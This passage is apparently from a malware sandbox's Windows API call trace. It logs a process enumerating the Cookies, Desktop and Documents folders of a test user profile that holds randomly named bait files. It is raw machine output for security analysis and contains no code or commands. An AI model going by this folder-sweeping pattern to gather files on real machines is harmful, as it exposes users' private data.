ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0142.986] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.986] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.986] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0142.986] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.986] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.986] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.986] PathFindFileNameW (pszPath="") returned="" [0142.987] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0142.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0142.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.987] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.987] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0142.987] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.987] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.987] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.987] PathFindFileNameW (pszPath="") returned="" [0142.987] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xafd0b720, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xafd0b720, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0142.987] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xafd0b720, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xafd0b720, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.987] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9da81790, ftCreationTime.dwHighDateTime=0x1d5e460, ftLastAccessTime.dwLowDateTime=0x236e9640, ftLastAccessTime.dwHighDateTime=0x1d5d987, ftLastWriteTime.dwLowDateTime=0x236e9640, ftLastWriteTime.dwHighDateTime=0x1d5d987, nFileSizeHigh=0x0, nFileSizeLow=0x3957, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0EzCM9-tf_RB.bmp", cAlternateFileName="0EZCM9~1.BMP")) returned 1 [0142.987] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83b3d6b0, ftCreationTime.dwHighDateTime=0x1d5ded1, ftLastAccessTime.dwLowDateTime=0x818df210, ftLastAccessTime.dwHighDateTime=0x1d5d942, ftLastWriteTime.dwLowDateTime=0x818df210, ftLastWriteTime.dwHighDateTime=0x1d5d942, nFileSizeHigh=0x0, nFileSizeLow=0x16da2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0l4yYrM-7lyKgSt6l2oj.m4a", cAlternateFileName="0L4YYR~1.M4A")) returned 1 [0142.987] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84df3f00, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0x84df3f00, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0x2fe6fd00, ftLastWriteTime.dwHighDateTime=0x1d62427, nFileSizeHigh=0x0, nFileSizeLow=0xd0e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="585939.exe", cAlternateFileName="")) returned 1 [0142.987] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x379f7f90, ftCreationTime.dwHighDateTime=0x1d5e43f, ftLastAccessTime.dwLowDateTime=0xceff4710, ftLastAccessTime.dwHighDateTime=0x1d5e7de, ftLastWriteTime.dwLowDateTime=0xceff4710, ftLastWriteTime.dwHighDateTime=0x1d5e7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9wq3-", cAlternateFileName="")) returned 1 [0142.987] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a69650, ftCreationTime.dwHighDateTime=0x1d5e395, ftLastAccessTime.dwLowDateTime=0x6c525430, ftLastAccessTime.dwHighDateTime=0x1d5de5c, ftLastWriteTime.dwLowDateTime=0x6c525430, ftLastWriteTime.dwHighDateTime=0x1d5de5c, nFileSizeHigh=0x0, nFileSizeLow=0xbd39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CcLKDbTD6tyGCey3Ua.m4a", cAlternateFileName="CCLKDB~1.M4A")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169ca150, ftCreationTime.dwHighDateTime=0x1d5e08a, ftLastAccessTime.dwLowDateTime=0x2792ea80, ftLastAccessTime.dwHighDateTime=0x1d5dcc7, ftLastWriteTime.dwLowDateTime=0x2792ea80, ftLastWriteTime.dwHighDateTime=0x1d5dcc7, nFileSizeHigh=0x0, nFileSizeLow=0x75c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cet3Az3xSsQyxidzz.m4a", cAlternateFileName="CET3AZ~1.M4A")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc9fa300, ftCreationTime.dwHighDateTime=0x1d5de31, ftLastAccessTime.dwLowDateTime=0xe04caa60, ftLastAccessTime.dwHighDateTime=0x1d5da2a, ftLastWriteTime.dwLowDateTime=0xe04caa60, ftLastWriteTime.dwHighDateTime=0x1d5da2a, nFileSizeHigh=0x0, nFileSizeLow=0xc3c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cng ImNwUeTB8VoeYMV.xlsx", cAlternateFileName="CNGIMN~1.XLS")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23dc7f0, ftCreationTime.dwHighDateTime=0x1d5d8f8, ftLastAccessTime.dwLowDateTime=0xc1eab930, ftLastAccessTime.dwHighDateTime=0x1d5dd2d, ftLastWriteTime.dwLowDateTime=0xc1eab930, ftLastWriteTime.dwHighDateTime=0x1d5dd2d, nFileSizeHigh=0x0, nFileSizeLow=0x8719, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="COJ9qY3Lw3.wav", cAlternateFileName="COJ9QY~1.WAV")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd217c770, ftCreationTime.dwHighDateTime=0x1d5e67a, ftLastAccessTime.dwLowDateTime=0x371fd330, ftLastAccessTime.dwHighDateTime=0x1d5d855, ftLastWriteTime.dwLowDateTime=0x371fd330, ftLastWriteTime.dwHighDateTime=0x1d5d855, nFileSizeHigh=0x0, nFileSizeLow=0x6f84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gbx6xqGKjI.ots", cAlternateFileName="GBX6XQ~1.OTS")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89f54e00, ftCreationTime.dwHighDateTime=0x1d5dc10, ftLastAccessTime.dwLowDateTime=0xec6554a0, ftLastAccessTime.dwHighDateTime=0x1d5e281, ftLastWriteTime.dwLowDateTime=0xec6554a0, ftLastWriteTime.dwHighDateTime=0x1d5e281, nFileSizeHigh=0x0, nFileSizeLow=0xc5e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gR-7-PyNnD-.m4a", cAlternateFileName="GR-7-P~1.M4A")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea571c90, ftCreationTime.dwHighDateTime=0x1d5e31a, ftLastAccessTime.dwLowDateTime=0x1ffd31f0, ftLastAccessTime.dwHighDateTime=0x1d5e527, ftLastWriteTime.dwLowDateTime=0x1ffd31f0, ftLastWriteTime.dwHighDateTime=0x1d5e527, nFileSizeHigh=0x0, nFileSizeLow=0x6118, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gU8b.bmp", cAlternateFileName="")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa0e5010, ftCreationTime.dwHighDateTime=0x1d5e147, ftLastAccessTime.dwLowDateTime=0x79d6eb40, ftLastAccessTime.dwHighDateTime=0x1d5db12, ftLastWriteTime.dwLowDateTime=0x79d6eb40, ftLastWriteTime.dwHighDateTime=0x1d5db12, nFileSizeHigh=0x0, nFileSizeLow=0xcfda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H7zxTF.m4a", cAlternateFileName="")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50be22d0, ftCreationTime.dwHighDateTime=0x1d5dc9a, ftLastAccessTime.dwLowDateTime=0x5efc46c0, ftLastAccessTime.dwHighDateTime=0x1d5e491, ftLastWriteTime.dwLowDateTime=0x5efc46c0, ftLastWriteTime.dwHighDateTime=0x1d5e491, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="muufurbDd2RM8", cAlternateFileName="MUUFUR~1")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44590c0, ftCreationTime.dwHighDateTime=0x1d5e467, ftLastAccessTime.dwLowDateTime=0x5fa8a110, ftLastAccessTime.dwHighDateTime=0x1d5df67, ftLastWriteTime.dwLowDateTime=0x5fa8a110, ftLastWriteTime.dwHighDateTime=0x1d5df67, nFileSizeHigh=0x0, nFileSizeLow=0x14497, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NeN_jI9ZZ.m4a", cAlternateFileName="NEN_JI~1.M4A")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2243380, ftCreationTime.dwHighDateTime=0x1d5de02, ftLastAccessTime.dwLowDateTime=0x9d82b660, ftLastAccessTime.dwHighDateTime=0x1d5d909, ftLastWriteTime.dwLowDateTime=0x9d82b660, ftLastWriteTime.dwHighDateTime=0x1d5d909, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o n2-l40PliXZ0b5", cAlternateFileName="ON2-L4~1")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f5ce90, ftCreationTime.dwHighDateTime=0x1d5dbcb, ftLastAccessTime.dwLowDateTime=0x2b096650, ftLastAccessTime.dwHighDateTime=0x1d5e12a, ftLastWriteTime.dwLowDateTime=0x2b096650, ftLastWriteTime.dwHighDateTime=0x1d5e12a, nFileSizeHigh=0x0, nFileSizeLow=0x7d39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RCXy1GDWWRD-GXFfqaR.pdf", cAlternateFileName="RCXY1G~1.PDF")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3d70b0, ftCreationTime.dwHighDateTime=0x1d5e5d8, ftLastAccessTime.dwLowDateTime=0xdb19b9b0, ftLastAccessTime.dwHighDateTime=0x1d5da76, ftLastWriteTime.dwLowDateTime=0xdb19b9b0, ftLastWriteTime.dwHighDateTime=0x1d5da76, nFileSizeHigh=0x0, nFileSizeLow=0x1703a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rsRQ6We.rtf", cAlternateFileName="")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3aa47a0, ftCreationTime.dwHighDateTime=0x1d5e034, ftLastAccessTime.dwLowDateTime=0x8a970f30, ftLastAccessTime.dwHighDateTime=0x1d5da42, ftLastWriteTime.dwLowDateTime=0x8a970f30, ftLastWriteTime.dwHighDateTime=0x1d5da42, nFileSizeHigh=0x0, nFileSizeLow=0x12a1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SOyx.m4a", cAlternateFileName="")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77027220, ftCreationTime.dwHighDateTime=0x1d5df7e, ftLastAccessTime.dwLowDateTime=0xe2a7ad60, ftLastAccessTime.dwHighDateTime=0x1d5e41a, ftLastWriteTime.dwLowDateTime=0xe2a7ad60, ftLastWriteTime.dwHighDateTime=0x1d5e41a, nFileSizeHigh=0x0, nFileSizeLow=0x425d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sUiS6_a YSuJteTE6mS5.m4a", cAlternateFileName="SUIS6_~1.M4A")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa46bb460, ftCreationTime.dwHighDateTime=0x1d5e456, ftLastAccessTime.dwLowDateTime=0x1fb35010, ftLastAccessTime.dwHighDateTime=0x1d5de76, ftLastWriteTime.dwLowDateTime=0x1fb35010, ftLastWriteTime.dwHighDateTime=0x1d5de76, nFileSizeHigh=0x0, nFileSizeLow=0x14bf3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x2j-5xZ2.mp3", cAlternateFileName="")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32751c0, ftCreationTime.dwHighDateTime=0x1d5da8a, ftLastAccessTime.dwLowDateTime=0x5f6c8f20, ftLastAccessTime.dwHighDateTime=0x1d5e2ac, ftLastWriteTime.dwLowDateTime=0x5f6c8f20, ftLastWriteTime.dwHighDateTime=0x1d5e2ac, nFileSizeHigh=0x0, nFileSizeLow=0x127e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZfF5zo.bmp", cAlternateFileName="")) returned 1 [0142.988] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32751c0, ftCreationTime.dwHighDateTime=0x1d5da8a, ftLastAccessTime.dwLowDateTime=0x5f6c8f20, ftLastAccessTime.dwHighDateTime=0x1d5e2ac, ftLastWriteTime.dwLowDateTime=0x5f6c8f20, ftLastWriteTime.dwHighDateTime=0x1d5e2ac, nFileSizeHigh=0x0, nFileSizeLow=0x127e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZfF5zo.bmp", cAlternateFileName="")) returned 0 [0142.988] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.988] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.988] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0142.988] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.988] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.989] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.989] PathFindFileNameW (pszPath="") returned="" [0142.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfb9ec80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfb9ec80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b358 | out: hHeap=0x620000) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfb9ec80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfb9ec80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5444f630, ftCreationTime.dwHighDateTime=0x1d5cc60, ftLastAccessTime.dwLowDateTime=0xed023950, ftLastAccessTime.dwHighDateTime=0x1d573d2, ftLastWriteTime.dwLowDateTime=0xed023950, ftLastWriteTime.dwHighDateTime=0x1d573d2, nFileSizeHigh=0x0, nFileSizeLow=0x16a48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0aQRRMZ9fXP6FOj2J.pptx", cAlternateFileName="0AQRRM~1.PPT")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2d78170, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0x81af76e0, ftLastAccessTime.dwHighDateTime=0x1d5ccd8, ftLastWriteTime.dwLowDateTime=0x81af76e0, ftLastWriteTime.dwHighDateTime=0x1d5ccd8, nFileSizeHigh=0x0, nFileSizeLow=0x18612, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2FCqPkFKph.docx", cAlternateFileName="2FCQPK~1.DOC")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f2cd560, ftCreationTime.dwHighDateTime=0x1d5b3ab, ftLastAccessTime.dwLowDateTime=0x26fff2a0, ftLastAccessTime.dwHighDateTime=0x1d5863e, ftLastWriteTime.dwLowDateTime=0x26fff2a0, ftLastWriteTime.dwHighDateTime=0x1d5863e, nFileSizeHigh=0x0, nFileSizeLow=0x5afb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2uMcBrfi.xlsx", cAlternateFileName="2UMCBR~1.XLS")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b4ac50, ftCreationTime.dwHighDateTime=0x1d5dc3d, ftLastAccessTime.dwLowDateTime=0x3d9ca5f0, ftLastAccessTime.dwHighDateTime=0x1d5e523, ftLastWriteTime.dwLowDateTime=0x3d9ca5f0, ftLastWriteTime.dwHighDateTime=0x1d5e523, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="78KUspWVJZetkP", cAlternateFileName="78KUSP~1")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2be25d0, ftCreationTime.dwHighDateTime=0x1d5de04, ftLastAccessTime.dwLowDateTime=0x2823e6c0, ftLastAccessTime.dwHighDateTime=0x1d5af9f, ftLastWriteTime.dwLowDateTime=0x2823e6c0, ftLastWriteTime.dwHighDateTime=0x1d5af9f, nFileSizeHigh=0x0, nFileSizeLow=0x88ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b8PRctIs3rirQlwvJ.xlsx", cAlternateFileName="B8PRCT~1.XLS")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6dc89e0, ftCreationTime.dwHighDateTime=0x1d58656, ftLastAccessTime.dwLowDateTime=0x5d8cfa60, ftLastAccessTime.dwHighDateTime=0x1d5c1d6, ftLastWriteTime.dwLowDateTime=0x5d8cfa60, ftLastWriteTime.dwHighDateTime=0x1d5c1d6, nFileSizeHigh=0x0, nFileSizeLow=0xfb20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bIP_fEMO.xlsx", cAlternateFileName="BIP_FE~1.XLS")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f31cfc0, ftCreationTime.dwHighDateTime=0x1d584d8, ftLastAccessTime.dwLowDateTime=0x42cabd00, ftLastAccessTime.dwHighDateTime=0x1d565d5, ftLastWriteTime.dwLowDateTime=0x42cabd00, ftLastWriteTime.dwHighDateTime=0x1d565d5, nFileSizeHigh=0x0, nFileSizeLow=0x8320, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CoXTxE9DA6.docx", cAlternateFileName="COXTXE~1.DOC")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: 